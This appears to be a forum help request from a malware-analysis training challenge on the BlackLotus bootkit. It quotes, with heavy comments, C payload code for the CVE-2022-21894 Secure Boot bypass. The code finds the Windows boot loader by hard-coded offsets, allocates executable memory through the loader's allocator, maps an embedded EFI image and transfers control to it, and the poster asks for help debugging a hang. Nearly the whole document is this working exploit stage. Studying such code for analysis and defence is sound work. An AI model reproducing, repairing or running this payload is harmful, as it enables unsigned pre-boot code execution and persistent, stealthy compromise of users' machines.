Z2A-BlackLotus Challenge stage 2 bootkit-rootkit analysis
Hello Mr.,
Please take a look at this code (reference: https://github.com/ASkyeye/CVE-2022-21894-Payload/blob/master/main.c#L43):
`#include <windows.h>
#include <winternl.h>
// Calling convention applied to every boot-manager function pointer typedef below.
#define EFIAPI __cdecl
// Element-by-element copy used in place of memcpy (presumably because no CRT
// memcpy is available in this context -- confirm). Dest and Src are not
// parenthesized and the loop index is a UINT64 named i, so only pass plain
// pointer expressions; the expansion already ends in ';', so each call site
// produces an extra empty statement.
#define MEMCPY(Dest, Src, Length) for(UINT64 i = 0; i < (Length); i++) Dest[i] = Src[i];
//Defines taken from https://github.com/btbd/umap/
// Memory type and attribute constants handed to BlImgAllocateImageBuffer. The
// RWX name indicates a single allocation that is both writable and executable,
// which is how McUpdateEntry uses it: it writes the image in, then jumps into it.
#define BL_MEMORY_TYPE_APPLICATION (0xE0000012)
#define BL_MEMORY_ATTRIBUTE_RWX (0x424000)
// Argument type of BlpArchSwitchContext: ApplicationContext == 0, FirmwareContext == 1
// (the commented-out calls in McUpdateEntry pass these as raw 0 and 1).
typedef enum E_EXECUTION_CONTEXT
{
ApplicationContext,
FirmwareContext
}EXECUTION_CONTEXT, * PEXECUTION_CONTEXT;
typedef DWORD64 EFI_STATUS;
// 16-bit character type intended to match the L"..." strings passed to print.
typedef unsigned short CHAR16;
// Boot-manager internals; McUpdateEntry reaches each one by a hard-coded offset.
typedef void(EFIAPI* BLP_ARCH_SWITCH_CONTEXT)(EXECUTION_CONTEXT newContext);
typedef NTSTATUS(EFIAPI* BL_IMG_ALLOCATE_IMAGE_BUFFER)(PVOID* imageBuffer, INT64 imageSize, INT32 memoryType, INT32 attributes, INT32 unused, BOOLEAN flags);
// Non-standard entry signature: the usual (imageHandle, systemTable) pair plus
// the context-switch routine, which the loaded image is expected to call itself.
typedef EFI_STATUS(EFIAPI* BOOT_ENTRY)(PVOID imageHandle, PVOID systemTable, BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext);
// printf-style routine inside the loader image; the caller reads its first
// argument from the pointer stored at printSystemTable + 0x40.
typedef EFI_STATUS(EFIAPI* print_entry)(PVOID SystemTable, CHAR16* String, ...);
// Embedded PE image that McUpdateEntry maps and executes; the byte array is
// elided in this listing (the author substituted a hello-world EFI binary).
BYTE efiApp[] = { 0x4D, 0x5A ,......}; // here was my hex code helloworld.efi
// Entry point reached from the boot manager with two function tables.
// It takes functionTableIn[3] as an address assumed to lie inside the loader
// image, scans backwards for that image's MZ header, validates the image
// against one hard-coded CheckSum, allocates an RWX buffer through the
// loader's own allocator, hand-maps the embedded PE from efiApp into it and
// transfers control to the mapped entry point. Every failure path jumps to
// Done, which spins forever, so the function never actually returns.
//
// Every offset used below (0xAE48, 0x11093C, 0x3CC0C, 0xC550, 0x113670,
// 0x1136C8) is relative to one particular build of the loader image; the
// CheckSum comparison is the only thing that keeps them from being applied
// to a different build.
//
// functionTableOut is never used.
// Returns: 0, unreachable in practice because of the spin at Done.
DWORD McUpdateEntry(PVOID* functionTableOut, PVOID* functionTableIn)
{
BOOT_ENTRY entry;
BL_IMG_ALLOCATE_IMAGE_BUFFER fpBlImgAllocateImageBuffer;
BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext;
// efiApp is parsed in place as a PE file: DOS header first, NT headers at e_lfanew.
PIMAGE_DOS_HEADER hvDosHeader, efiDosHeader = (PIMAGE_DOS_HEADER)efiApp;
PIMAGE_NT_HEADERS hvNtHeaders, efiNtHeaders = (PIMAGE_NT_HEADERS)(efiApp + efiDosHeader->e_lfanew);
PIMAGE_SECTION_HEADER secHeader, section;
PBYTE imageBuffer = NULL, src, dest;
PVOID hvLoaderAddr, printProc, hvLoaderBase = NULL, efiSystemTable, efiImageHandle, printSystemTable;
// Size of the mapped image, taken straight from the embedded PE's optional header.
DWORD64 imageSize = efiNtHeaders->OptionalHeader.SizeOfImage;
// Slot 3 of the incoming table is assumed to point inside the loader image;
// nothing validates that beyond the MZ scan and CheckSum test below.
hvLoaderAddr = functionTableIn[3];
// Fixed offsets from that address: a printf-like routine and a pointer to the
// table whose entry at +0x40 is passed as the routine's first argument.
printProc = (PVOID)((DWORD_PTR)hvLoaderAddr + 0xAE48);
printSystemTable = *(PVOID*)((DWORD_PTR)hvLoaderAddr + 0x11093C);
print_entry print = (print_entry)(printProc);
print((*(PVOID*)((DWORD_PTR)printSystemTable + 0x40)), L"dropped the secure boot by MAHA1 :\n");
//1. Locate the loader image base
// Walks backwards one byte at a time from printProc until an MZ header is
// found. The only other stop condition is the pointer reaching NULL, so a
// miss means reading through every address below printProc. The match tests
// four bytes and skips index 3.
for (PBYTE searchAddr = printProc; searchAddr; searchAddr--)
{
if (searchAddr[0] == 'M' && searchAddr[1] == 'Z' && searchAddr[2] == 0x90 && searchAddr[4] == 0x03)
{
hvLoaderBase = searchAddr;
break;
}
}
if (!hvLoaderBase)
goto Done;
hvDosHeader = (PIMAGE_DOS_HEADER)hvLoaderBase;
hvNtHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)hvLoaderBase + hvDosHeader->e_lfanew);
// Bail unless the found image has the exact CheckSum the offsets below were
// derived from; with any other build every offset would be wrong.
if (hvNtHeaders->OptionalHeader.CheckSum != 0xEC35E) //It's better to have one check too much than too few
goto Done;
// Resolve the loader's allocator, its context-switch routine and its saved
// EFI image handle / system table, all at fixed offsets from the image base.
fpBlImgAllocateImageBuffer = (BL_IMG_ALLOCATE_IMAGE_BUFFER)((DWORD_PTR)hvLoaderBase + 0x3CC0C);
fpBlpArchSwitchContext = (PVOID)((DWORD_PTR)hvLoaderBase + 0xC550);
efiImageHandle = *(PVOID*)((DWORD_PTR)hvLoaderBase + 0x113670);
efiSystemTable = *(PVOID*)((DWORD_PTR)hvLoaderBase + 0x1136C8);
//2. Allocate 1:1 PA-VA buffer
// Requested with BL_MEMORY_ATTRIBUTE_RWX: one buffer that is both written to
// below and executed from. The trailing 0b00000001 flag is a bare literal
// whose meaning is not documented in this listing.
if (!NT_SUCCESS(fpBlImgAllocateImageBuffer(&imageBuffer, imageSize, BL_MEMORY_TYPE_APPLICATION, BL_MEMORY_ATTRIBUTE_RWX, 0, 0b00000001)))
goto Done;
if (!imageBuffer)
goto Done;
//3. Copy headers
MEMCPY(imageBuffer, efiApp, efiNtHeaders->OptionalHeader.SizeOfHeaders);
//4. Map sections
// The section table starts right after the optional header. Each section's
// raw bytes are copied from its file offset in efiApp to its RVA inside
// imageBuffer; VirtualAddress and SizeOfRawData are trusted as-is, with no
// bounds check against imageSize. Relocations and imports are not processed.
secHeader = (PIMAGE_SECTION_HEADER)((UINT64)&efiNtHeaders->OptionalHeader + efiNtHeaders->FileHeader.SizeOfOptionalHeader);
for (WORD i = 0; i < efiNtHeaders->FileHeader.NumberOfSections; i++)
{
section = &secHeader[i];
if (section->SizeOfRawData)
{
dest = (PVOID)(imageBuffer + section->VirtualAddress);
src = (PVOID)(efiApp + section->PointerToRawData);
// MEMCPY declares its own UINT64 i in a nested scope, shadowing the
// section index; the outer i is not affected.
MEMCPY(dest, src, section->SizeOfRawData);
}
}
//5. Call entry point
if (efiNtHeaders->OptionalHeader.AddressOfEntryPoint)
{
/*
* We use a custom entry point to pass the address of BlpArchSwitchContext to our EFI application.
* Before it can call EFI services, it needs to call BlpArchSwitchContext with 'FirmwareContext' as argument (and revert this before returning).
*/
//fpBlpArchSwitchContext(0);
// The entry address is computed from the mapped buffer, not from efiApp.
entry = (BOOT_ENTRY)(imageBuffer + efiNtHeaders->OptionalHeader.AddressOfEntryPoint);
print((*(PVOID*)((DWORD_PTR)printSystemTable + 0x40)), L"dropped the secure boot by MAHA==2 :\n");
//fpBlpArchSwitchContext(1); ///when i tried to call this function fpBlpArchSwitchContext(1) it stuck
// Control transfers to the mapped image here; the third argument hands it
// the context-switch routine as described in the comment above.
entry(efiImageHandle, efiSystemTable, fpBlpArchSwitchContext); // it is exit and not printing any text
}
Done:
// Every exit path ends here and spins; the return below is dead code.
while (1);
return 0;
}`